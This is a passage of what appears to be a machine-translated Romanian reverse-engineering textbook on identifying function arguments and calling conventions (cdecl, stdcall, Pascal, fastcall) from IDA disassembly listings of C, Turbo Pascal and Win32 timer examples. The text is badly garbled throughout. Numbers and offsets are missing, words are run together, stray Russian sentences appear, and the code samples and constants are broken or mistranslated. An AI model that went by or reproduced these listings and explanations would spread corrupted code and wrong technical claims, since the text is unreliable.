lc];Aducem conținutul argumentului EBP+arg c în ECH Ce indică el?;Reamintim că tipul int esteîn structura x octeți din;Început, și arg - și există începutul său Apoi, x + x == ohis ;Adică, valoarea unuitip variabil de int, un membru al structurii este introdus în ECH Push Ech;Aducem variabila primită în stivă,transmisând -o după valoare;(După valoare - deoarece ESH stochează o valoare, nu un indicator) Mov edx, [ebp+arg ];Luămunul dintre cele două argumente de neînțeles enumerate de acesta din urmă B;Stack Pushh Edx; și, din nou împinsîn stivă, trecându -l pe următoarea funcție Capitolul Identificarea argumentelor funcțiilor MOV EAH, [EBP+Arg ] Push EAH;Luăm al doilea argument de neînțeles și îlîmpingem în stivă Push Offset Afxs;"%F,%x,%s \ n" apel printf;OP!Apel printf cu transmisia liniei de specific!Funcțiaprintf;După cum știți, are un număr variabil de argumente, tip și cantitate;care sunt setate în mod specific despecificatori Reamintim - mai întâi în stivă;Am adus indicatorul la linie și, într -adevăr, extremadreaptă;Specificatorul "%s" indică producția liniei ;Apoi un tip variabil de int și al doilea din dreapta;Specificatoruleste %x - concluzia întregului în formă hexadecimală ;Dar apoi apoi există ultimul specificator %f, în timp ceintră;Au fost introduse două argumente ;Analizând gestionarea programatorului în Microsoft Visual C ++, noi;Am citit căspecificatorul %f dispersează materialul valoarea asta în;În funcție de tipul poate ocupa patru octeți (float) și opt;(Dubla) În cazul nostru, acesta ocupă înmod clar opt octeți, prin urmare ,;Aceasta este dublă Astfel, am restabilit prototipul funcției noastre, aici;HE: CDECLMUFUNC (Double A, Struct B) ;Tipul de apel CDECL - adică stiva a șters funcția sfidătoare Asta e doar;Din păcate,adevărata procedură pentru transferul de argumente nu poate fi restabilită ;Reamintim, Borland C ++ a curățat și funcțiade sticlă, dar;a schimbat neautorizat procedura de transmitere a parametrilor ;Se pare că dacă programul a fost compilatde Borland C ++, atunci suntem simpli;Schimbăm ordinea argumentelor pentru invers Din păcate, acest lucru nu este atâtde simplu ;Dacă a existat o transformare clară a tipului de funcție în CDECL, atunci Borland;C ++, fără inițiativăinutilă, ar fi făcut așa cum a fost ordonat și;Atunci apelul ordinului de argumente ar da rezultatul greșit ;Cu toateacestea, adevărata procedură pentru urmărirea argumentelor din prototipul funcției;Nu joacă niciun rol Este importantdoar să legați transmisia și acceptată;Argumentele, pe care le -am făcut ;Vă rugăm să rețineți: acest lucru a devenitposibil numai cu analiza comună și;Funcții cauzate și sfidătoare Funcții Analiza doar a uneia dintre ele nu ar finimic;a dat-o!Notă: nu ar trebui să te bazezi niciodată necondiționat;Fiabilitatea liniei specifice De la specific;Elesunt formate manual de către el însuși programatorul, erorile sunt posibile aici, uneori;Foarte dificil de vibrant și dea da unul extrem de misterios după compilare;Code Adăugare ESP, H ebp ebp retn myfunk endp Deci, unele progrese aufost deja realizate-am restabilit cu încredere prototipul primei noastre funcții Dar acesta este doar începutul acumar trebui să luați în considerare un subiect important, dar mai degrabă obositor - o analiză comparativă a diferitelortipuri de apeluri funcționale și implementarea acestora în compilatoarele populare ParteaIII Identificarea structurilor cheie ale Acordului standard al limbilor de nivel ridicat - STDCALL va începe cu un acordstandard - STDCALL Luați în considerare un exemplu dat în lista Listarea Demonstrația stadcall #include #include stdcall myfunk (int, charn *c) {return a+b+strlen (c);Main () {printf ("%x \ n", myfunk( x x , "hello, world '" ")),- rezultatul compilării acestui exemplu folosind Microsoft Visual C ++ ar trebui săarate ca setările implicite, deoarece afișat așa cum se arată în lista Lista Rezultatul compilării exempluluifolosind acordul STDCALL folosind compilatorul Microsoft Visual C ++ cu setările principale implicite din apropiereasetărilor Cod xref- start-raf-lp push ebp ebp ebp, esp push offset ahelloworld;const chaar *;Intrăm indicatorul pe liniaAhelloworld ;Privind textele sursă (bine avem), vom găsi;Că acesta este cel mai corect argument transmis funcțiilor -Prin urmare, avem înainte de noi un tip de apel stdcall sau cdecl, dar nu,- pascal Acordați atenție - linia estetransmisă de legătura, dar nu de;sens Împinge h;int;Aducem un alt argument în stivă - un tip constant Int ;(IDAîncepând cu versiunea determină automat tipul său) Împinge h;int;Transferim funcțiile ultimul, cel mai stângaargument, -;Tip constant int Sună Myfunk;Acordați atenție - După ce a apelat la funcție, nu există comenzi;Curățareastivei de argumentele aduse în ea Dacă compilatorul nu este;a mestecat și nu a recurs la curățarea întârziată, apoi celmai probabil, stivă;Curăță funcția cauzată Deci, tipul de apel este stdcall;(ceea ce, de fapt, trebuia sădemonstreze) GPAVA Identificarea argumentelor funcțiilor ;Transmitem valoarea următoarei funcții returnate defuncție;Ca argument Push Offset ASC ;"%x \ n" apel pnntf;Ok, următoarea funcție este printf și o linie despecificatori;arată că argumentul transmis are tipul de int Adăugați ESP, ;Opt octeți de la Stack - patru suntexpulzați la argument;Tip Int, restul de patru - pe indicatorul către linia specificilor Pop ebp retn endp principal;în cdecl myfunk (int, int, conta char *) myfunc proc în apropiere;Cod xref: sub d+ când;Din versiunea , IDArestabilește automat prototipurile funcțiilor, dar;Nu este întotdeauna corect În acest caz, nepoliticos a fostpermis;Eroare - tipul de apel nu poate avea în niciun fel tipul de CDecl, deoarece stiva se șterge;Funcția cauzată!Separe că IDA RGO nu se angajează deloc;încearcă să analizeze tipul de apel și îl ia din setările derecunoaștere;compilator implicit În general, fie că poate, dar cu rezultatele;Lucrările IDA trebuie abordate cuatenție Arg = dword ptr arg = dword ptr och arg = dword ptr loh push ebp mov ebp, esp push esi;Acest lucru, dupăcum puteți vedea, păstrează registrul în stivă și nu transmiterea acestuia;Funcții, deoarece registrul nu a fost inițialinițial;Apelând, niciuna cauzată de o funcție Mov ESI, [EBP+arg ];Aducem ultimul argument în registrul ESI Adăugați ESI, [EBP+arg ];Îndoițiconținutul ESI cu penultimul stivă;Argument MOV EAX, [EBP+arg ];Aducem penultimul argument și Împingeți eah;constchaar *; O trimitem la stivă Apelați strlen;Deoarece Strlen se așteaptă ca indicatorul să fie cu încredere cuîncredere;Pentru a concluziona că înaintașul următorului argument este o linie;Transferat de link Adăugați ESP, Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Curățarea ultimului argument de laStack Adăugați eah, ESI;După cum ne amintim, valoarea primelor două argumente este stocată în ESI;Iar în EAX - lungimeareturnată a liniei Astfel, funcția rezumă cele două argumente ale sale cu o lungime a liniei Pop esi pop ebp retnoch;Stack curăță funcția cauzată, prin urmare, tipul de apel al stdcall;Sau Pascal Presupunem că acesta este stdcall,apoi prototipul funcției;Se pare că: int myfunk (int a, int b, char *c) ;Ordinea argumentelor rezultă din faptul că eraudouă în vârful stivei;Variații precum Int, și sub ele - o linie De când în vârful stivei;Întotdeauna se află ceea ce afost introdus în ea și software;Argumentele stdcall sunt introduse de la dreapta la stânga, obținem doar asta;Procedurapentru următoarele argumente Acordul MyFunk Endp CDECL și acum să ne uităm la modul în care apelează funcțiaCDECL Modificare în exemplul precedent (vezi Lista ) cuvântul cheie stdcall pe CDECL (lista ) Escilând Demonstrație ■ * #include #include cdecl myfunk (int a, int b, char * c) {return a+b+strlen(c);} Main () {printf ("%x \ n", myfunk ( x x , "hello, world "));} rezultatul compilării exemplului dat înlista ar trebui să arate așa cum se arată în lista Rezultatul compilării exemplului,Damssttryst^p^toss #include // atenție!Microsoft Visual C ++ nu mai acceptă tipul de apel Pascal // În schimb, utilizați un tipsimilar de apel pentru el Winapi, // Definit în fișierul #If definit ( MSC ver) #include //Porniți Windows H numai dacă Microsoft Visual C ++ // pentru restul soluției de compilatoare mai eficiente // - folosindcuvântul cheie Pascal, dacă sunt, / / susține -l, // susține -l (Borland susține) #DEIF // Programare similară, poate //și face ca lista să fie mai puțin citită, dar permite // să o compileze cu mai multe compilatoare!#If definit ( msc ver)winapi #lse pascal #dinif myfunc (int, int, char *c) {retum a+b+strlen (c);Main () printf ("%x \ n", myfunk( x x , "salut, lume!"));Rezultatul compilării exemplului dat în lista , folosind compilatorul Borland C ++,arată așa cum se arată în listare ;Int cdecl Main (int argc, Consta char ** argv, const char *envp) main proc aproape Date Xref: Date: J O PUSH MOV EBP EBP, ESP PUSH PUSH PUSH H;Int H;Int offset Ahelloworld;S Transmite funcțiileargumentelor Analizând textul sursă, remarcăm, capitolul Identificarea argumentelor funcțiilor ;că argumentelesunt transmise de la stânga la dreapta Cu toate acestea, dacă textele inițiale;Nu, este imposibil să stabilești acestfapt!Din fericire, un prototip autentic;Funcțiile nu sunt importante Sună Myfunk;Funcția nu curăță stiva!Dacă acesta nueste rezultatul optimizării;- Tipul ei de apel este fie Pascal, fie STDCALL Datorită faptului că Pasacal;Deja am fostfolosite, vom presupune că avem de -a face cu stdcall push eAh push offeset uk ;Format Call Printf Add ESP, XOREAX, EAX POP EBP Retn JNain Endp;int cdecl myfunk (const char *s, int, int);Ara Ida a dat din nou rezultatulgreșit!Tipul de apel nu este clar CDecl!;Cu toate acestea, altfel, prototipul funcției este adevărat, sau mai degrabă,nu că este adevărat;(De fapt, procedura pentru argumente este inversă), dar pentru utilizare -;Potrivit Myfunk proc înapropiere;Cod xref: main+ îp s = dword ptr arg = dword ptr och arg = dword ptr loh push ebp mov ebp,esp;Deschide rama Stack mov eax, [ebp+s];Intrăm într -un șir la EAX PUSH EAH;S Call strlen;Trimiteți funcțiile salestrlen Pop ecx;Curățăm stiva unui argument, împingându -l;Într -un registru neutilizat Mov edx, [ebp+arg ];Intrăm tipularg pe EDX Adăugați edx, [ebp+arg ];Îndoiți -l cu argumentul arg Adăugați eax, edx;Îndoiți cantitatea de arg șiarg cu o lungime de lungime ROR EBP PARTEA III Identificarea structurilor cheie ale limbilor de nivel înalt retnoch;Stack curăță funcția cauzată Deci, tipul său Pascal sau stdcall MyFunk Endp După cum puteți vedea, identificareatipurilor de apeluri de bază și restaurarea prototipurilor funcțiilor este o ocupație simplă Singurul lucru care stricăstarea de spirit este confuzia cu Pascal și STDCall, dar procedura pentru aducerea argumentelor în sticlă nu contează,cu excepția cazurilor speciale, dintre care unul este demonstrat de exemplul dat în lista #include #include #include // Callback-Procedure pentru primirea mesajelor de la cronometru Void callbacktimerproc (hwnd hwnd, // mânerul ferestrei pentru mesaje de cronometru uint umsg, // wm timer mesaj uint iDevent, //identificator de cronometru dwword dwtime // timp curent de sistem // ззуковые сигалы MessageBeep ((dwtime % )* x ) ;// Afișăm timpul în câteva secunde care a trecut de la începutul sistemului printf (\ r: =%d ", dwtime / ); main ()// da, aceasta este o aplicație de consolă, dar poate, de asemenea au // ciclul de eșantionare a mesajelor și instalațicronometrul! {int a; msg msg; // setați cronometrul, trimițându -l adresa procedurii TimerProc Settimer ( , , ,TimerProc); // Ciclul eșantionului mesaje îl puteți întrerupe // apăsând + while (getMessage (& msg,(hwnd) null, , )) {translateMessage (& msg); DisatchMessage (& MSG);}} Will Will Compilați acest exemplu introducândurmătoarea comandă: Cl Pascal Callback C User ib, apoi DizAssemble fișierul rezultat (listarea ), să vedem ces -a întâmplat GPAVA Identificarea argumentelor funcțiilor Listare* f u = principalul proc din apropiere;Cod xref: start+af^p;De data aceasta, IDA nu a determinat prototipul funcției Eibine, bine msg = msg ptr - h;IDA Pro Dizassembler a recunoscut o variabilă locală și chiar;A restaurat tipul său,ceea ce plăcește Push EBP MOV EBP, E SP Sub Esp, OH Push Offset TimerProc;Iptimerfunk;Transmitem indicatorul cătrefuncția TimerProc Push ;Ulapse;Trimiteți timpul de întârziere a timpului ;Nldevent;În aplicațiile consolei,argumentul nldevent este întotdeauna ignorat de Push ;Hwnd;Nu există ferestre, transferim apeluri nul DS:settimer;Funcțiile Win ARI sunt apelate în cadrul acordului STDCALL - Acest lucru dă;oportunitatea, cunoaștereaprototipului lor (și este descrisă în SDK) de a restabili tipul și;Numirea argumentelor În acest caz, textul sursă arătaastfel:- settimer (null, taur, , timerproc);LOC :;Cod xref: main+ ^j push ;Wmsgfiltermax;NULL - Fără FiltruPush ;WMSGFILTERMIN;NULL - Fără Filtru Push ;Hwnd;NULL - Nu există ferestre în consola aplicației Lea EAX,[EBP+MSG];Obținem un pointer la variabila locală MSG -;Tipul acestei variabile este determinat, apropo, numai pe bazaunui prototip;Funcții GetMessagea PUSH EAH;Ipmsg;Trimiteți indicatorul la MSG Sunați DS: GetMessagea;Apelați funcțiaGetMessagea (& MSG, NULL, NULL, NULL);Test EAX, EAX JZ scurt LOC B;Verificați primirea wm quit LEA ECX, [EBP+MSG] PARTEA III Identificarea structurilor cheie ale limbilorde nivel ridicat;În ECH - un indicator către structura completată a MSG Push Ech;Ipmsg; Transformăm funcțiile saleTranslateMessage Call DS: TranslateMessage;Numim funcția TranslateMessage (& MSG);Lea Edx, [EBP+MSG];În EDX - unindicator către MSG Împingeți edx;Ipmsg;Transmitem apelurile sale de dispecere DS: DisatchMessagea;Apelând ladispeceratmessagea funcția zTR scurtă LOC ;Mesaje de ciclu de eșantionare OS V :;Cod xref: main+ c? ;Producția TOL ESP, EBP POP EBP Retn Main Endp TimerProc Proc aproape;Date xref: main+ îo;Prototipul TimerProc datorităapelului său implicit de către sistemul de operare;IDA nu a fost restaurat automat - va trebui să facem acestlucru ;Știm că TimerProc este transmis de Settimer ;Analizând descrierea settimerului (SDK ar trebui să fie întotdeaunala îndemână!) Vom găsi;Prototipul său :; void callback timerproc (; hwnd hwnd, // mânerul ferestrei pentru mesaje decronometru; uint umsg, // mesaj wm timer; uint idevent, // identificator de cronometru; dword dwtime;Rămâne să se ocupede tipul de apel De data aceasta este fundamental, pentru că nu;Având codul funcției sfidătoare (este situat adânc înintestinele sălii de operație; sisteme), vom face față tipurilor de argumente numai dacă este;Cunoașteți comanda lor detransfer ;S -a spus anterior că toate funcțiile de apel de apel urmează acordul Pascal ;Nu confundați funcțiile deapelare cu Win cu funcția ARI!Primul se numește în sine;Sistemul de operare, iar acesta din urmă este un program deaplicații ;OK, tipul de apeluri de apel această funcție este Pascal Deci, argumentele sunt aduse în stânga;În dreapta,iar fluxurile curăță funcția cauzată (asigurați -vă că este; într -adevăr) Arg c = dword ptr h;Un singur argument afost descoperit, deși, judecând după prototip, sunt transmise;Patru De ce?Foarte simplu - funcția a folosit un singurargument, Capitolul Identificarea argumentelor funcțiilor , dar nu s -a aplicat restului Aici IDA ProDizassembler nu le -a putut restabili!Apropo, care este acest argument?Ne uităm: deplasarea sa este egală cu OHS Și înpartea de sus a stivei este o valoare care a fost listată în sticlă Dar atunci se dovedește că argumentul DWTime a fostadus în stivă în primul rând?(Noi, având textul original, știm că arg c este cu siguranță DWTime) Dar Acordul Pascaldictează procedura opusă pentru introducerea argumentelor!Ceva nu este în regulă aici dar programul funcționează(rulați -l pentru a verifica) Și SDK spune că callback -ul este un analog al lui Far Pascal Cu FAR, este clar că înferestrele pe de biți toate apelurile sunt mai apropiate, dar cum să explicați inversarea trimiterii deargumente?!Загляните в и посмотрите, как там определен тип PASCAL: #ellf ( MSC VER >= ) IIdefined( STDCALL SUPPORTED) #define CALLBACK stdcall #define WINAPI stdcall #define WINAPIV cdecl#define APIENTRY WINAPI #define APIPRIVATE stdcall # de £ ine Pascal stdcall nu, bine, cine s -ar fi gândit!! 'Provocarea anunțată ca Pascal este de fapt stdcall!Și Callback - definit în același mod ca STDCALL În cele din urmă,totul a fost explicat!Acum, dacă vă spun că apelul de apel este Pascal, nu puteți decât să rânjești și să spui căariciul este și o pasăre, deși mândră - până când nu o vei obține, nu va zbura!(Se dovedește că săparea în fișiereleDeglude poate fi benefică) Apropo, aceste perversiuni cu tipuri de tipuri creează o mare problemă atunci când conectațimodulele scrise într-un mediu care acceptă membrul Pascal pentru a apela funcțiile la Projectul C Deoarece nu existăPascal în Windows Pascal, iar STDCall va funcționa, respectiv, nu va fi nimic!Adevărat, există și un cuvânt cheie pascal, care nu se suprapune, dar nu este acceptat de cele mai recente versiuni ale Microsoft Visual C ++ Produsulconstă în utilizarea inserțiilor de asamblare sau în tranziția către Borland C ++, care, la fel ca mulți alțicompilatori, Acordul Pascal încă mai susține în mod regulat Așadar, am aflat că argumentele funcției Callbac sunttransmise de la dreapta la stânga, dar stiva curăță funcția cauzată, deoarece ar trebui să fie în conformitate cudecontarea STDCALL Push EBP MOV EBP, ESP MOV EAX, [EBP+arg c];Intrăm în argumentul DWTime în EAX ;Cum am obținut -o?Neuităm - în fața lui în stivă sunt trei argumente;Fiecare dintre ele având o dimensiune de octeți, apoi * = xs XorEdx, Edx;Număr edx mov ecx, ;Alocarea valorii ECX div Ecx;Împărțiți DWTime (IT în EAX) cu shl edx, ;În EDX -restul diviziei, îl multiplăm cu o schimbare ciclică cu x , Partea III Identificarea structurilor cheie alelimbilor de nivel ridicat;mai precis, Îl înmulțim cu Pushh Edx;UTYPE transmit rezultatul funcției de messament Privind SDK, vom constata că MessageBeepacceptă una dintre constante: NB OK, MB ICONASTERK, MB ICONHAND, etc , dar nu se spune nimic despre ce valoare directăare fiecare dintre ei Dar se raportează că MessageBeep este descris în fișierul Открываем его и ищемконтекстным поиском МВ ОК: #define МВ ОК OxOOOOOOOOL #define MB OKCANCEL #define MB ABORTRETRYIGNORE #defineMB YESNOCANCEL #define MB YESNO #define MB RETRYCANCEL OxOOOOOOOlL x L X L X L X L#define MB ICONHAND #define MB ICONQUESTION #define MB ICONEXCLAMATION #define MB ICONASTERISK OxOOOOOOlOL x L x L X L ;Vezi: Toate constantele interesate de noi sunt egale :; x , x , x , x , x Acum sensuldevine clar;programe Luarea reziduurilor obținute prin împărțirea numărului de milisecunde;Trecut de la un minut depornire a sistemului la , obținem numărul B;Interval de la la Înmulțirea acestuia cu x , obținem x - x Apelați DS: MessageBeep;Semnale de sunet MOV EAX, [EBP+arg c];Aducem EAX DWTIME XOR EDX, EDX;Număr edx mov ecx, e h;În performanța zecimală a HZA , DIVC ECX;Împărțiți DWTime cu - T E Traducem milisecunde în câtevasecunde și împingem EAH;Trimiteți funcțiile sale printf Push Offset AD;"\ R: =%d" apel printf add esp, ;Printf ("\ r:=%d") pop ebp retn loh;Ieșind, curățați stiva!Timerproc Endp Capitolul Identificarea funcțiilor funcțiilor , onotă cel puțin despre tipurile definite în a fost deja menționată în comentarii la listarea , repetareanu va fi de prisos, funcția de apel și de apel și de Winapi urmează acordul cu privire la provocările lui Pascal, dartipul de provocare în sine Pascal definit în ca stdcall (și pe unele platforme și ca CDECL) Astfel, peplatforma Intel, toate funcțiile Windows sunt urmate de un Argumentele acordului „sunt introduse de la dreapta lastânga, iar stiva este curățată de funcția cauzată, să facem cunoștință în strecția Pascal Creați un program simplu înPascal și Dizassemble Desigur, acest lucru nu înseamnă că apelurile Pascal se găsesc doar în programele Pascal, dar vafi adevărat Exemplul analizat este dat în lista Utilizează Wincrt;Procedura myProc (a: cuvânt; b; byte; c:string);Începe writeln (a+b, '', c);Sfârşit;Începeți MyProc ( USD, USD, „salut, marinar”);Sfârşit Rezultatulcompilării acestui exemplu de către Turbo Pascal pentru Windows Compiler arată ceva de genul acesta prezentat în lista cel mai simplu exemplu de program NARASA PROC în apropierea apelului inittask;InittAsk Apelați de la KRNL exepentru inițializarea apelului de sarcină pe biți @ Systemlnit $ qy;Inițializarea sistemului systemlnit(void) apel @ wincrtinit $ qv; Wincrtinit (void);Inițializarea modulului Wincrt BP MOV BP, SP;Prologul funcției înmijlocul funcției!;Aici este, Turbo-Pascal!Hog ah, ah sunați @ stackcheck $ $ q word;Verificare de preaplin a stivei(AX);Verificarea stivei pentru preaplinul de apăsare h;Atenție - Transferul de argumente este de la stânga la dreaptaPush H;„W” mov di, compensă ahellosailor;"Bună ziua, Sailor ''; în di - indicatorul de pe linia" Hello, Sailor "PushDS Partea III Identificarea structurilor cheie ale limbilor de nivel înalt împingeți di; vezi: nu este aproape(apropiat) este transmis, dar indicatorul îndepărtat (îndepărtat) -; adică segmentul și deplasarea liniei Call Murgos;stivează funcția cauzată Ieaaa; epilogul funcției - Închiderea cadrului stivei Hog ah, ah Call @halt $ Q word; Halt(Word); sfârșitul programului! Program Endp MyProc Proc Near; Code xref: Program+ Speed; IDA nu a determinatprototipul funcției Ei bine, o vom face noi înșine! Var = Byte PTR - H; variabilă locală Judecând după faptulcă este x bytes mai mare; cadrul lui Stach, se pare că se prezintă că aceasta este o serie de bytes x Deoarece,; lungimea maximă a liniei în Pascal este doar egală cu Oxff Bytes Bytes Se pare că acesta este un tampon rezervatsub linie Arg = DWORD PTR arg = byte ptr arg = cuvânt ptr oah; funcția ia trei argumente Push bp mov bp, sp;deschide cadrul steki LoOh, sunați la @ StackCheck $ Q word;Verificare de preaplin a stivei (AX);Verificăm - dacăexistă de octeți pentru locali în stivă;variabile Sub sp, h;Rezervăm spațiu sub variabile locale Este di,[bp+arg ];Obținem un pointer la cel mai corect argument Pushh es Push DI;Vezi - transmitem un indicator îndepărtatcătre argumentul arg și acesta;Segmentul de la Stack nu a fost nici măcar extras!Lea di, [bp+var ];Obținem unpointer către un tampon local Push SS Capitolul Identificarea argumentelor funcțiilor ;Îi aducem segmentul în stivă Împinge DI;Aducem boofer -ul compensat lastivă Împingeți offh; Intrăm lungimea maximă a liniei Sunați @$ Basg $ qm stringtl Byte;Stocați șir;Copiați linia în bufferul local (ceea ceînseamnă că arg este o linie) ;Adevărat, este complet de neînțeles de ce Nu îl puteți folosi;legătură?;Da, nu se poateface nimic - în Pascal, liniile sunt transmise de -a lungul;Înțeles :-( MOV DI, Offset unk le ; obținem un indicator labufferul de ieșire Un număr variabil; argumente (în orice caz, fără trucuri suplimentare) Dar Writeln este o procedurăcu un număr variabil de parametri Compilațiile o împart în multe provocări; proceduri pentru ieșirea fiecărui argumentseparat Prin urmare; în codul compilat, fiecare procedură va primi una fixă; numărul de argumente În cazul nostru, vorexista trei: primul pentru ieșire; Cantitatea de două numere - aceasta este procedura WriteLongint, a doua - a doua -;pentru ieșirea simbolului GAP într -o formă simbolică - face acest lucru; WriteChar și, în sfârșit, acesta din urmă -pentru ieșirea liniei - Scriere Dows aduce direct linia în fereastră și;Nu puteți uita de asta chiar acolo, deoarecefereastra poate în orice moment;Necesită redarea - sistemul de operare nu îl salvează;Cuprins - într -un mediu grafic curezoluție înaltă;Acest lucru ar duce la costuri mari de memorie ;Codul care afișează linia trebuie să -și poată repetaconcluzia la cerere ;Toți cei care au programat cel puțin o dată sub Windows, probabil își amintesc de asta;Întreagaconcluzie a trebuit să fie plasată într -un manipulator de mesaje WM PAIN ;Turbo Pascal vă permite să contactațiWindows-IT în același mod;Ca o consolă Și dacă așa-el trebuie să păstreze totul undeva, mai devreme;afișat peecran Deoarece variabilele locale mor cu;Finalizarea procedurii lor, apoi nu sunt potrivite pentru stocareatamponului ;Rămâne fie o grămadă, fie un segment de date Pascal îl folosește pe acesta din urmă -;Tocmai am primit unindicator către un astfel de tampon ;Mai mult, pentru a crește productivitatea producției, instrumente turbo-pascale;Ceamai simplă memorie cache Funcțiile Writelingint, WriteChar, Writestring sunt drenate;Rezultatul activității sale înformă simbolică este cel mai tampon și B;Sfârșitul urmează Writeln apelând conținutul tamponului în fereastră ;Sistemulde timp de rulare monitorizează redacțiile sale și, dacă este necesar;Repetă concluzia deja fără participareaprogramatorului împinge ds împinge di;Intrăm adresa tamponului în stivă Partea a III -a Identificarea structurilorcheie ale limbilor de nivel înalt, mov al, [BP+arg ];Tip de argument arg - byte Xor Ah, ah;Număr Registrul de octețisenior AH Adăugați ax, [bp+arg ];Fold arg C arg De când AL a fost extins anterior;Înainte de AH, atunci arg areun cuvânt de tip, deoarece atunci când există două numere de altele diferite;Type Pascal le extinde la mai multe dintreele ;În plus, procedura sfidătoare transmite valoarea cu acest argument; x , care, evident, nu s -ar încadra înocteți Xor DX, DX;Numărul DX împinge dx; și aduce -l la stivă Push topor;Aducem suma a două argumente stângi înstivă Împinge ;Un alt zero!Sunați @Write $ qm Text LonGint word;Scrie (var f; v: longint; lățime: cuvânt);FuncțiaWriteLongint are următorul prototip :;WriteLongint (text Far &, la Longint, CountTword);Unde - - Text Far & - unindicator pentru bufferul de ieșire;a - ieșire întreagă întreg;Număr - Câte variabile de afișat (zero - ovariabilă) ;Deci, în cazul nostru, retragem o variabilă - suma de două;argumente O adăugare mică - funcția WriteLongintnu ar trebui să fie;Acordul Pascal, deoarece nu curăță complet stiva, plecând;Indicați tamponul în stivă Dezvoltatoriide compilator au mers la acest pas;Pentru a crește performanța: Deoarece va fi necesar indicatorul către tampon;și altefuncții (cel puțin una dintre ele - Writeln), de ce acesta;Fie scoateți -l, apoi aruncați -l din nou febril?;Dacă teuiți la sfârșitul funcției WriteLongint, vei găsi acolo;Ret , adică funcția Paches două argumente - două cuvinte demașină pe;Longint și un cuvânt pe număr ;Iată un mic detaliu tehnic atât de drăguț Ea este mică;Mic, dar cât deconfuz!(Mai ales dacă cercetătorul nu este familiarizat cu sistemul de intrare de intrare Pascal) Împinge oh;'';Aducemurmătorul argument în sticlă, transmis la funcția funcțiilor Writeln;(Indicatorul către tampon este încă înstivă) Împinge ;Trebuie să scoatem un singur simbol GPAVA Identificarea funcțiilor de Call @Write $qm Text Char word;WRITEțVAR F; C: CHAR;Lățime: cuvânt) Lea di, [bp+var ];Obținem un indicator pentru o copie locală afuncției liniei transmise Push ss împinge di;Intrăm adresa sa în stivă împinge o;Afişa O singură linie!Sunați @Write $ qm TextM String word;Scrierețvar f;S: șir;Lățime: cuvânt) Apelați @Writeln $qm Text;Writeln (var f: text);Se pare că nu se transmite parametri, dar, de fapt, porniți;Partea de sus a stivei se aflăun indicator către tampon și își așteaptă „Ora de stea” ;După finalizarea Writeln, acesta va fi eliminat dinstivă Sunați @ iocheck $ qy;Ieșiți dacă eroare;Verificarea operației de ieșire pentru succes Ieaaye;Închideți ramalui Stack Retn ;Turnați opt octeți cu stivă Ok, acum știm tot ce ai nevoie;Pentru a restabili prototipul proceduriinoastre Arată așa:;MyProc (A: Byte, B: Word, C: String);MyProc Endp Da, Turbo Pascal s -a dovedit a fi viclean!Analizaprogramului, o analiză cu ajutorul său, ne -a prezentat o lecție foarte importantă - nu puteți fi niciodată sigur căfuncția împinge toate argumentele de la Stack și chiar mai mult nu puteți determina numărul de argumente după număr decuvinte de mașină eliminate din stivă!Provocări rapide - FA STEA II, indiferent cât de neproductivă este transmisiaargumentelor prin stivă și tipurile de apeluri STDCall și CDECL sunt standardizate, așa că doriți - nu doriți, dartrebuie observate În caz contrar, modulele compilate de un compilator (de exemplu, bibliotecile) vor fi incompatibile cumodulele compilate de alți compilatori Cu toate acestea, dacă funcția cauzată este compilată de același compilator cadefiant, pentru a respecta acordurile tipice la nimic mai eficient care transmite argumente prin registre Mulțiprogramatori începători sunt surprinși: de ce transferul de argumente prin registre încă nu este standardizat și estepuțin probabil să fie standardizat deloc?Răspuns: Și cine ar putea fi standardizată?Comitetele de standardizare C și C++?Desigur că nu!-Toate decizii dependente de platformă sunt lăsate la fapta dezvoltatorilor de compilatori care le esteliber să le implementeze în felul lor sau să nu le implementeze deloc „Ei bine, ei au convins”, un alt cititor nu va fide acord, „ci ceea ce împiedică compilatorii de Partea a III -a Identificarea structurilor cheieale limbilor de nivel înalt al unei platforme specifice pentru a fi de acord cu acordurile generale După ce Toți, aufost de acord să transfere valoarea returnată de funcție prin [e] ah: [E [e] dx], deși în standardul despre registrelespecifice nu se spune deloc ”Ei bine, parțial dezvoltatori și sunt de acord: majoritatea compilatorilor de biți aurespectat acordurile generale (deși acest lucru nu a fost foarte trumpetat cu voce tare), dar fără pretenții decompatibilitate unul cu celălalt O provocare rapidă - se numește rapid pentru a asigura performanța maximă Tehnica deoptimizare nu stă nemișcat și intră în standard - este ca și cum ai lega o greutate la picior Pe de altă parte, câștigulmediu din transferul de argumente prin intermediul registrelor este un singur interes - iată mulți compilatori și refuzăviteza în favoarea ușurinței implementării În plus, dacă performanța este atât de critică - utilizați funcțiiconstruite Cu toate acestea, toate aceste raționamente sunt interesante în primul rând pentru programatori, în timp cecercetătorii programelor nu sunt îngrijorați de eficacitate, ci de restaurarea prototipurilor funcțiilor Este posibil săaflați ce argumente acceptă funcțiile FastCaii fără a analiza codul său (adică, în funcție doar de funcția cauzată)?Nuexistă un răspuns extrem de popular, acest lucru nu este posibil, deoarece compilatorul transferă argumente înregistrele cele mai „convenabile” este greșit, iar vorbitorul demonstrează în mod clar neînțelegerea sa completă atehnicii de compilare Există un astfel de termen ca „o unitate de difuzare” - în funcție de implementare, compilatorulpoate traduce întregul text al programului în ansamblu (care este foarte obscen, deoarece va trebui să stocați întregularbore al analizei sintactice în memorie), sau transmite fiecare funcție separat, păstrându -l, păstrând în memorie,doar numele ei și o legătură către codul generat pentru ea Primele compilatoare de tip sunt extrem de rare Compilatoriide cel de -al doilea tip sunt mai productivi, necesită mai puțină memorie, mai ușor de implementat Cu alte cuvinte,acestea sunt bune pentru toți, cu excepția incapacității complete de a „face” optimizarea - fiecare funcție esteoptimizată „personal” și indiferent de alta Prin urmare, compilatorul nu poate alege registrele optime pentru transferulde argumente, deoarece nu știe cum manipulează funcția cauzată de acestea Deoarece funcțiile sunt difuzate în modindependent, astfel de compilatoare trebuie să respecte acordurile generale, chiar dacă este dezavantajos Astfel,cunoașterea „scrierii de mână” a unui anumit compilator, puteți restabili prototipul funcției fără dificultate Borland C++ Borland C ++ x Argumente de transmitere prin registre: AX (AL), DX (DL), VX (BL), iar când se termină registrele,argumentele încep să fie trimise la stivă, introducând -o din de la stânga la dreapta și răsfățați -vă Funcția cauzată (ca în cazul stdcall) Schema de transmisie a argumentelor este destul de interesantă - compilatorul nuremediază registrele „sale” pentru fiecare argument, în schimb, oferă acces gratuit la fiecare dintre ei la „grămada”candidaților stabiliți în ordinea preferințelor Fiecare argument elimină cât mai multe registre din stivă, iar atuncicând stiva este epuizată, atunci va trebui să meargă la stivă Excepția este tipul de int lung, transmis întotdeauna prinDX: AX (în plus, cuvântul mai vechi este transmis la DX), iar dacă acest 